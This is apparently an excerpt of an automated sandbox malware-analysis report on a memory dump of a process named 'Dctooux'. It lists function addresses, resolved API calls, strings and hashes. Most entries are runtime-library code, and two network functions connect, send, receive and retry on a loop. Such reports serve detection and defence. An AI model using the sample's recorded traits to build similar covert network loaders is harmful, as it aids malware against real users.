VUUU, xrefs: 00A57391

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 417534d99af04cc93ad9e23fd99e3f9d3144891b6815e0e6ede8e85b153545a4
Instruction ID: 4f71a812f285e95d0a818dea5eee924e5ecb87900d52283b33ec95fb37000d3e
Opcode Fuzzy Hash: 417534d99af04cc93ad9e23fd99e3f9d3144891b6815e0e6ede8e85b153545a4
Instruction Fuzzy Hash: C1418E70244702BFE320DB64DC09F5ABBE8FF88B11F000429FA45A65E0D7B0A915CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00A72263 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A72366
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A723B2

Part of subcall function 00A73AAD: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00A73BA0

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00A7241E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A7243A
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A7248E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00A724BB
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00A72511

Strings

(, xrefs: 00A72372

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 61e10298715774c94b9421b96b89224397731f41168babd0930ba35eaddd3e13
Instruction ID: 02ed7a18e74580182823f602128ca31dcee33fbe7c1415a66efa54795d681418
Opcode Fuzzy Hash: 61e10298715774c94b9421b96b89224397731f41168babd0930ba35eaddd3e13
Instruction Fuzzy Hash: F7B15D71A00611AFDB28CF68DD91B7AB7B9FB44300F15C16EE849AB651D734ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A72A52 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7414C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00A7415F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00A72A64

Part of subcall function 00A7425F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00A74289
Part of subcall function 00A7425F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00A742F8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00A72B96
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00A72BF6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00A72C02
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00A72C3D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00A72C5E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00A72C6A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00A72C73
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00A72C8B

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 6561f6b3725f526fc39d54fd936c0cf814d74fc914b84fd6982e12b6605ba88c
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: 93815B71E006259FCB19DFA9C984A6DB7F6FF88304B15C6ADE409AB705C770AD42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A80098 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A800D1

Part of subcall function 00A7A37F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A7A3A0

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A80137
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00A8014F
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00A8015C

Part of subcall function 00A7FBFF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00A7FC27
Part of subcall function 00A7FBFF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00A7FCBF
Part of subcall function 00A7FBFF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00A7FCC9
Part of subcall function 00A7FBFF: Concurrency::location::_Assign.LIBCMT ref: 00A7FCFD
Part of subcall function 00A7FBFF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A7FD05

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: b4a3eb57fa465ed9cd28bd0656754c986c959954e800aef1f0d47b042c9fd576
Instruction ID: d7b45fff77c19cecab95bf25b852a024e290596df20f4543d2bce6d84e1f354b
Opcode Fuzzy Hash: b4a3eb57fa465ed9cd28bd0656754c986c959954e800aef1f0d47b042c9fd576
Instruction Fuzzy Hash: 0A519031A00205DBDF15EFA4CD99FAEB771AF45710F144168E9067B392CB70AE0ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A6DBB8 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A6DBBE
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A6DBCC
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A6DBDD
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A6DBEE
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A6DBFF
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A6DC10
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00A6DC21
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A6DC32
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00A6DC43
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A6DC54
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A6DC65
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A6DC76
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A6DC87
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A6DC98
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A6DCA9
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A6DCBA
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A6DCCB
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00A6DCDC
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00A6DCED
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00A6DCFE
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00A6DD0F
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00A6DD20
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00A6DD31
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00A6DD42
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00A6DD53
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00A6DD64
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A6DD75
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00A6DD86
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A6DD97
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A6DDA8
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00A6DDB9
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A6DDCA
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00A6DDDB
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A6DDEC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00A6DDFD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00A6DE0E
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00A6DE1F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00A6DE30
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00A6DE41
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00A6DE52
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00A6DE63

Strings

CompareStringEx, xrefs: 00A6DE36
GetLocaleInfoEx, xrefs: 00A6DE47
FlsSetValue, xrefs: 00A6DBF4
CreateThreadpoolWork, xrefs: 00A6DE03
FlsFree, xrefs: 00A6DBD2
FlushProcessWriteBuffers, xrefs: 00A6DCD1
SleepConditionVariableCS, xrefs: 00A6DD9D
WakeAllConditionVariable, xrefs: 00A6DD8C
CreateThreadpoolTimer, xrefs: 00A6DC5A
ReleaseSRWLockExclusive, xrefs: 00A6DDE1
SubmitThreadpoolWork, xrefs: 00A6DE14
InitializeConditionVariable, xrefs: 00A6DD6A
SleepConditionVariableSRW, xrefs: 00A6DDF2
LCMapStringEx, xrefs: 00A6DE58
CreateThreadpoolWait, xrefs: 00A6DC9E
SetFileInformationByHandle, xrefs: 00A6DD48
kernel32.dll, xrefs: 00A6DBB9
InitOnceExecuteOnce, xrefs: 00A6DC16
WaitForThreadpoolTimerCallbacks, xrefs: 00A6DC7C
AcquireSRWLockExclusive, xrefs: 00A6DDBF
FlsAlloc, xrefs: 00A6DBC6
CloseThreadpoolWork, xrefs: 00A6DE25
CreateEventExW, xrefs: 00A6DC27
TryAcquireSRWLockExclusive, xrefs: 00A6DDD0
InitializeSRWLock, xrefs: 00A6DDAE
SetThreadpoolWait, xrefs: 00A6DCAF
WakeConditionVariable, xrefs: 00A6DD7B
GetSystemTimePreciseAsFileTime, xrefs: 00A6DD59
FlsGetValue, xrefs: 00A6DBE3
CloseThreadpoolTimer, xrefs: 00A6DC8D
GetTickCount64, xrefs: 00A6DD26
CreateSemaphoreExW, xrefs: 00A6DC49
FreeLibraryWhenCallbackReturns, xrefs: 00A6DCE2
CloseThreadpoolWait, xrefs: 00A6DCC0
CreateSymbolicLinkW, xrefs: 00A6DD09
GetCurrentProcessorNumber, xrefs: 00A6DCF3
GetCurrentPackageId, xrefs: 00A6DD15
CreateSemaphoreW, xrefs: 00A6DC38
InitializeCriticalSectionEx, xrefs: 00A6DC05
SetThreadpoolTimer, xrefs: 00A6DC6B
GetFileInformationByHandleEx, xrefs: 00A6DD37

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: bc245a1468042b0b50086c7a0ceec5a0cb7088eb7b57ecc33cc7e4e33d2e953e
Instruction ID: 18973c2e992b529bb63484156f794c5a183487b9eb38c9cdd8a144aa5a2a7054
Opcode Fuzzy Hash: bc245a1468042b0b50086c7a0ceec5a0cb7088eb7b57ecc33cc7e4e33d2e953e
Instruction Fuzzy Hash: 2F61EF72956311BBCB10EFFCAC4E9467BA8BB1B7023018A1AB501D71E2DBB85513CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00A5EAD0 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 388networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6DAFC: mtx_do_lock.LIBCPMT ref: 00A6DB04

send.WS2_32(00000000,?,00000004,00000000), ref: 00A5EB1E
send.WS2_32(00000000,?,00000008,00000000), ref: 00A5EB5A
send.WS2_32(00000000,?,?,00000000), ref: 00A5EB9C
__Mtx_unlock.LIBCPMT ref: 00A5EBBC
getaddrinfo.WS2_32(?,00000000,?,?), ref: 00A5ED1C
freeaddrinfo.WS2_32(?), ref: 00A5ED3D
socket.WS2_32(00000002,00000001,00000000), ref: 00A5ED65
connect.WS2_32(00000000,?,00000010), ref: 00A5ED77
closesocket.WS2_32(00000000), ref: 00A5ED91
__Mtx_unlock.LIBCPMT ref: 00A5EE3D
recv.WS2_32(00000000,?,00001F40,00000000), ref: 00A5EE76
recv.WS2_32(00000000,?,00001F40,00000000), ref: 00A5EEA4
closesocket.WS2_32(?), ref: 00A5EF18

Part of subcall function 00A6D609: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A6D615

__Mtx_unlock.LIBCPMT ref: 00A5EF4D

Strings

list too long, xrefs: 00A5EF8D

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Mtx_unlocksend$closesocketrecv$connectfreeaddrinfogetaddrinfomtx_do_locksocketstd::invalid_argument::invalid_argument
String ID: list too long
API String ID: 3781055590-1124181908
Opcode ID: a34155223aa0a0d517a919abc190a5158efee04bd4417542630360fbb5cc9641
Instruction ID: 6c251bd5a98396ab3cc20a20079de23155b7ef8aeb1273b6087e334f8bf08485
Opcode Fuzzy Hash: a34155223aa0a0d517a919abc190a5158efee04bd4417542630360fbb5cc9641
Instruction Fuzzy Hash: 3DD1F0B1E04214AFDB24DF64CD45BAAB7B8FF04311F0042A9EC1DA7291EB31AE59CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A6E47E Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00AB8640,00000FA0,?,?,00A6E45C), ref: 00A6E48A
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00A6E45C), ref: 00A6E495
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00A6E45C), ref: 00A6E4A6
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A6E4B8
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A6E4C6
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00A6E45C), ref: 00A6E4E9
___scrt_fastfail.LIBCMT ref: 00A6E4FA
DeleteCriticalSection.KERNEL32(00AB8640,00000007,?,?,00A6E45C), ref: 00A6E505
CloseHandle.KERNEL32(00000000,?,?,00A6E45C), ref: 00A6E515

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A6E490
SleepConditionVariableCS, xrefs: 00A6E4B2
WakeAllConditionVariable, xrefs: 00A6E4BE
kernel32.dll, xrefs: 00A6E4A1

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: b51995708dec25e0e81e452c54c7e5221c65ae49203a7c460c4757fb0fa825a2
Instruction ID: c9d0e999e7d0386465997770109ee00c05be73e0c39fdb72fab528f6016e7c66
Opcode Fuzzy Hash: b51995708dec25e0e81e452c54c7e5221c65ae49203a7c460c4757fb0fa825a2
Instruction Fuzzy Hash: 5D014C75A40313BBDA20DBFDAC1DB6A7768BB42B417058614F905D22E0EF648812CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A83B1E Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00A83B30

Part of subcall function 00A8392E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A83951

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00A83B51
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00A83B5E
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00A83BAC
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00A83C33
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00A83C46
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00A83C93

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 77c117cb3d7aff0aa70701bd34eea4af2b77fa6e09a2ec76ad8bb61f2046ae5c
Instruction ID: b5aefabf20e0f99a4dd149556907540c95e78bbe44d30f94cc0b44579bef9694
Opcode Fuzzy Hash: 77c117cb3d7aff0aa70701bd34eea4af2b77fa6e09a2ec76ad8bb61f2046ae5c
Instruction Fuzzy Hash: D281DF72804249ABDF12EF54CA45BFE7FB2AF05B04F044098FC416B292C7768E29DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A7592E Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00A75988

Part of subcall function 00A75769: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 00A75835
Part of subcall function 00A75769: InitializeSListHead.KERNEL32(?), ref: 00A7583F

ListArray.LIBCONCRT ref: 00A759BC
Hash.LIBCMT ref: 00A75A25
Hash.LIBCMT ref: 00A75A35
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00A75ACA
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00A75AD7
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00A75AE4
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00A75AF1

Part of subcall function 00A7B091: std::bad_exception::bad_exception.LIBCMT ref: 00A7B0B3

RegisterWaitForSingleObject.KERNEL32(?,00000000,00A78E65,?,000000FF,00000000), ref: 00A75B79
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00A75B9B
GetLastError.KERNEL32(00A768DB,?,?,00000000,?,?), ref: 00A75BAD
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00A75BCA

Part of subcall function 00A70FFA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,00A768DB,00000008,?,00A75BCF,?,00000000,00A78E56,?,7FFFFFFF,7FFFFFFF,00000000), ref: 00A71012

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A75BF4

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: f62b9970454e0f535927ce84673b4c0a818440ec1491d9ff49720ff933f2ff19
Instruction ID: 4acda138c712843995ecbe4976647d4968ff97ebefb7474ed7fa55a23d515af2
Opcode Fuzzy Hash: f62b9970454e0f535927ce84673b4c0a818440ec1491d9ff49720ff933f2ff19
Instruction Fuzzy Hash: C2812EB0A11A52FED718DF788D45BD9FBA8BF09700F10821AF52D97281DBB4A560CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5F250 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125networksleepCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000002,?), ref: 00A5F2BD
htons.WS2_32(00000000), ref: 00A5F2F1
inet_pton.WS2_32(00000002,00AB63E8,?), ref: 00A5F304
socket.WS2_32(00000002,00000001,00000000), ref: 00A5F310
connect.WS2_32(00000000,?,00000010), ref: 00A5F323
Sleep.KERNEL32(00000BB8,?,00000000,?,?,?,?,?,00000000,00A9B9D8,000000FF,?,00A5F37F), ref: 00A5F345
closesocket.WS2_32 ref: 00A5F34D
socket.WS2_32(00000002,00000001,00000000), ref: 00A5F355
